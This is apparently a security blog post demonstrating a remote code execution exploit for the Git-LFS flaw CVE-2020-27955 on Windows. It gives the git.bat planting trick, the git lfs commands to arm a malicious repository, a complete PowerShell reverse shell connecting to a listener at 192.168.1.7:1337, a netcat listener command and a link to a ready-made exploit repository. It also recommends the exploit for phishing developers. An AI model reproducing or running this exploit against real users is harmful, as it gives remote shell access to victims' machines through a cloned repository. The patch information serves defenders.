Git-LFS RCE Exploit (CVE-2020–27955)
Git is one of the most developer-preferred version control systems for tracking changes in source code during software development. Recently, an exploit revolving around an extension of Git called Git-LFS (Git Large File Storage) was discovered by a Security Researcher, Dawid Golunski. Git on Windows includes the Git-LFS extension by default. Git LFS replaces large files such as audio samples, videos, datasets, and graphics with text pointers inside Git, while storing the file contents on a remote server like GitHub.com or GitHub Enterprise. In this blog, we shall see two types of Proof of Concepts (PoC) to successfully exploit the vulnerability :
- The first PoC will demonstrate the creation of a file upon successful exploitation.
- The second PoC will demonstrate how we can use this exploit to gain a reverse shell upon successful exploitation.
Introduction
Git-LFS has a vulnerability in versions <= 2.12 that enables remote attackers to execute arbitrary code on the Windows system of the victim if the victim actually clones the repository of attackers using common git version control software that uses the subsystem Git-LFS.
Vulnerable Tools
Various tools in their default configurations are exposed to this vulnerability. Some of them include :
- Git
- GitHub CLI (gh CLI)
- GitHub Desktop
- SourceTree
Description
- The subsystem (Git-LFS) when executing a new git process via the ExecCommand() function , does not specify the full path to the git binary.
- The exec.Command() function’s implementation on Windows Systems refers to the current directory. As a result, attackers can create a malicious repository planted with a backdoor.
- This can be done by simply adding an executable file named git.bat, git.exe, git.cmd, or any other extension that is used in the victim’s system, into the malicious repository. The file extension is dependent on the PATHEXT environment variable.
- This will execute the malicious git binary planted instead of the original git binary located in a trusted path.
Exploitation
- Create a repository (malicious) on GitHub and initialize it with a README.md file.
- Clone the repository onto your machine.
- Create a file named git.bat with the contents :
echo EXPLOITED > GITHACKED
- Add LFS file entries to the repository. This is necessary to trigger the vulnerable git-lfs extension when the repository is cloned and processed by the main git process. Commit both the exploit & the LFS files to the repository.
git lfs track "*.dat"
echo "big fat bug, lfs data" > lfs.dat
git add .gitattributes
git add *
git commit -m 'git-lfs poc' -a
git push
At this point, your malicious repository is ready to be cloned by the victim. Once the victim clones your malicious repository, the malicious executable (git.bat) will be downloaded into the repo’s directory and automatically be executed by the git-lfs extension without any user interaction.
As a result, ‘GITHACKED’ file should appear in the repo’s directory.
At this point, we have successfully exploited an RCE on the target’s windows machine.
Before we move ahead to the second type of exploitation (gain reverse shell access using the GIT-LFS RCE), let’s discuss a little about the business impact of the vulnerability.
Business Impact
The vulnerability can lead to a full compromise of the victim’s system as attackers can execute arbitrary commands remotely without the knowledge of the victim and the vulnerability is trivial to exploit.
Applications using git with unpatched Git LFS (git-lfs) <= 2.12 on Windows
systems (Windows Server 2019, Windows 10 Pro, etc.)
The following clients have been confirmed to be exploitable in their default
configuration / installation:
- Git for Windows
- GitHub CLI (gh)
- GitHub Desktop
- SmartGit
- SourceTree
- Visual Studio Code
- GitKraken
There are likely many more. Some of the other popular clients/development IDEs are deemed to be affected as well as most clients IDEs install git with git-lfs extension by default:
- Eclipse
- fork
- tig
- GitExtensions
- Magit
- TortoiseGit
- gmaster
- GitAhead
- Sublime Merge
- Visual Studio
- GitAtomic
- Tower
- git-cola
Web applications / hosted repositories running on Windows which allow users to import their repositories from a URL may also be exposed to this vulnerability.
Now that we have seen the business impact of the vulnerability, let’s get into the second proof of concept wherein we shall attempt to gain a reverse shell via the vulnerability.
POC 2: Gain a reverse shell upon successful exploitation
So, in order to gain a reverse shell, we will need to make the victim’s system connect to our Command & Control server (C2 Server). For the purpose of this demonstration, my C2 server will reside at 192.168.1.7 and will listen on port 1337 (nc -l -p 1337)
The strategy used here is that we will first create a PowerShell script (revsh_powersh.ps1)which will attempt to connect to our C2 server. Then, we will make the malicious executable (git.bat) execute the PowerShell script that resides in the same repository.
revsh_powersh.ps1
$client = New-Object System.Net.Sockets.TCPClient("192.168.1.7",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
git.bat
powershell -NoProfile -NonInteractive -ExecutionPolicy Bypass .\revsh_powersh.ps1
For complete access to the repository, you can clone/fork the repository. The link to the repository is: https://github.com/thatonesecguy/git-lfs-RCE-exploit-CVE-2020-27955
Listening on port 1337 on our C2 server
Victim (Windows machine) clones the repository
BOOM!!! REVERSE SHELL GAINED!!!!
And that is how we can successfully exploit the vulnerability to gain a reverse shell!!!
Solution
This Remote Code Execution vulnerability was reported to git-lfs vendor who issued a patched version 2.12.1 on the official git-lfs website linked below.
This vulnerability is of particular usage to phish developers of the target organization. It could also serve as an entry point into the internal network during Red Team assessments with proper usage of advanced phishing techniques. I hope y’all enjoyed reading the blog and until next time, HAPPY HACKING!!!
